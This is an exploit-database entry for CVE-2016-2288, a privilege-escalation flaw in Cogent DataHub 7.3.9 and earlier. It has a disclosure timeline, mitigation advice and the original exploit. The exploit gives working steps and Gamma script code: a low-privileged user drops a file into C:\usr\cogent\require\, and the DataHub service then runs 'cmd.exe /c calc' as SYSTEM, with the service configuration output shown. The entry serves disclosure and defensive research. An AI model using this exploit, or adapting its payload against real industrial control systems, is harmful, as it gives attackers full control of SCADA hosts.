Cogent Datahub - exploit.company

vendor:

Cogent Datahub

by:

mr_me

7.8

CVSS

HIGH

Elevation of Privilege

Unknown

CWE

Product Name: Cogent Datahub

Affected Version From: <= 7.3.9

Affected Version To: 7.3.2009

Patch Exists: NO

Related CWE: CVE-2016-2288

CPE: a:cogentdatahub:cogent_datahub:7.3.9

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x86

2016

Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability

The Cogent Datahub version 7.3.9 and below is vulnerable to an elevation of privilege vulnerability. By placing a specially crafted script file in the appropriate directory, an attacker can execute arbitrary code with elevated privileges. The vulnerability has been assigned the CVE-2016-2288 identifier.

Mitigation:

Install the latest version of Cogent Datahub, which is not affected by this vulnerability. Additionally, restrict access to the affected directories to authorized users only.

Source

Exploit-DB raw data:

/*

# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE‑2016-2288

sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792  CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01

Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released

Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script

Exploitation:
=============

As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.

C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Cogent DataHub
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cogent DataHub
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\Users\steven>
*/

require ("Application");
require ("AsyncRun");				// thanks to our friends @ Cogent

class WebstreamSupport Application
{

}

method WebstreamSupport.constructor ()
{
	RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}

Webstream = ApplicationSingleton (WebstreamSupport);